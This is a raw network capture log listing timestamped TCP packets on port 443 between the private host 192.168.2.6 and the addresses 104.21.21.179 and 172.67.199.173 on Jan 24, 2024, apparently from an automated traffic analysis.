                                                          Jan 24, 2024 15:34:31.977566004 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:31.978034019 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:31.978053093 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:31.987152100 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.017004967 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.032069921 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.032375097 CET49767443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.032390118 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.032938004 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.037334919 CET49767443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.037437916 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.037796021 CET49767443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.044001102 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044064045 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044120073 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.044137955 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044451952 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044496059 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044517040 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.044524908 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044547081 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.044600010 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.044605970 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.045150042 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.045312881 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.045363903 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.045392990 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.045409918 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.045418024 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.045905113 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.046147108 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.046219110 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.046987057 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.047022104 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.047049999 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.047058105 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.047161102 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.047823906 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.047883034 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.047890902 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.047959089 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.054347038 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.054522991 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.054569006 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.054584980 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.054706097 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.054780006 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.054828882 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.054836988 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.055038929 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.055246115 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.055402994 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.055458069 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.055463076 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056085110 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056176901 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056265116 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.056271076 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056308031 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.056318045 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056346893 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056360960 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.056911945 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.056958914 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.056965113 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.057003021 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.061459064 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.061533928 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.062094927 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.062150955 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.062880039 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.062935114 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.062937021 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.062952042 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.062985897 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.066878080 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.067338943 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.067353964 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.067723989 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.068099022 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.068164110 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.068490028 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.081908941 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.086847067 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.086935043 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.086945057 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.086970091 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.086992979 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.087009907 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.087088108 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.087138891 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.087965012 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.088043928 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.088071108 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.088120937 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.088717937 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.088789940 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.113898993 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.119775057 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.142364025 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.142612934 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.142740965 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.142757893 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.142844915 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.142925978 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.142993927 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.142999887 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.143064022 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.143495083 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.143569946 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.151083946 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.151163101 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.151174068 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.151747942 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.151880980 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.151887894 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.151928902 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.151935101 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.162156105 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.162209034 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.162226915 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.162239075 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.162292957 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.162962914 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.163038015 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.163815975 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.163872004 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.163911104 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.163911104 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.163919926 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.163973093 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.164608955 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.164640903 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.164747000 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.164755106 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.164877892 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.165452957 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.165522099 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.166075945 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.166105986 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.166161060 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.166167021 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.166212082 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.166250944 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.166250944 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.168661118 CET49764443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.168679953 CET44349764172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172530890 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172616959 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.172629118 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172666073 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.172671080 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172700882 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172714949 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.172801018 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.172852039 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.172858000 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.173003912 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.173402071 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.173465014 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.174226046 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.174256086 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.174262047 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.174340963 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.174355984 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.174374104 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.174381018 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.174420118 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.174877882 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.174891949 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.175112009 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.175169945 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.175865889 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.175951004 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.176276922 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.176337957 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.176362038 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.176410913 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.177027941 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.177073956 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.177128077 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.177285910 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.177330017 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.177380085 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.177396059 CET44349765172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:32.177407980 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.177438021 CET49765443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:32.187403917 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.187443972 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.187680006 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.187939882 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.187952995 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.224659920 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.225703955 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.225720882 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.226834059 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.226913929 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.227443933 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.227443933 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.227510929 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.274204969 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.274225950 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.320172071 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.421293020 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.421746016 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.421758890 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.422172070 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.422588110 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.422648907 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.422894001 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.445566893 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.469902992 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.478554964 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.478579998 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.479065895 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.479880095 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.479959011 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.480232954 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.521904945 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.523857117 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.524039030 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.524101019 CET49767443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.524718046 CET49767443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.524733067 CET44349767104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.559999943 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.560039997 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.560153961 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.560246944 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.560281038 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.561005116 CET49768443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.561021090 CET44349768104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721688032 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721755028 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721781015 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721807003 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721856117 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.721875906 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721925974 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721926928 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.721940041 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.721993923 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.722028971 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.722028971 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.722038984 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.722378016 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.722500086 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.722510099 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.777487040 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.813433886 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813478947 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813498974 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813515902 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813541889 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.813553095 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813594103 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.813616037 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813651085 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813671112 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813678026 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.813683987 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.813709021 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.814292908 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.817051888 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.817070007 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820501089 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820565939 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820600033 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820630074 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820657969 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820672035 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.820672035 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.820692062 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.820914984 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.821221113 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.821324110 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.821352959 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.821906090 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.821911097 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.821926117 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.821963072 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.821984053 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822015047 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822047949 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822087049 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.822087049 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.822096109 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822870970 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822904110 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822947025 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.822978020 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.822988987 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.823018074 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.871093988 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.871104956 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.908077002 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908138037 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908165932 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908214092 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.908221006 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908274889 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.908581972 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908622026 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908643961 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908710957 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.908715963 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.908761024 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.909323931 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.909362078 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.909384966 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.909415007 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.909420013 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.909461975 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.910126925 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910167933 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910198927 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910218000 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.910222054 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910259962 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.910264969 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910916090 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.910959959 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.910964012 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.919861078 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920243979 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920329094 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.920347929 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920470953 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920547009 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.920555115 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920938015 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.920969963 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.921021938 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.921066046 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.921066046 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.921077013 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.921611071 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.921905041 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.921916962 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.922425985 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.922462940 CET44349769104.21.21.179192.168.2.6
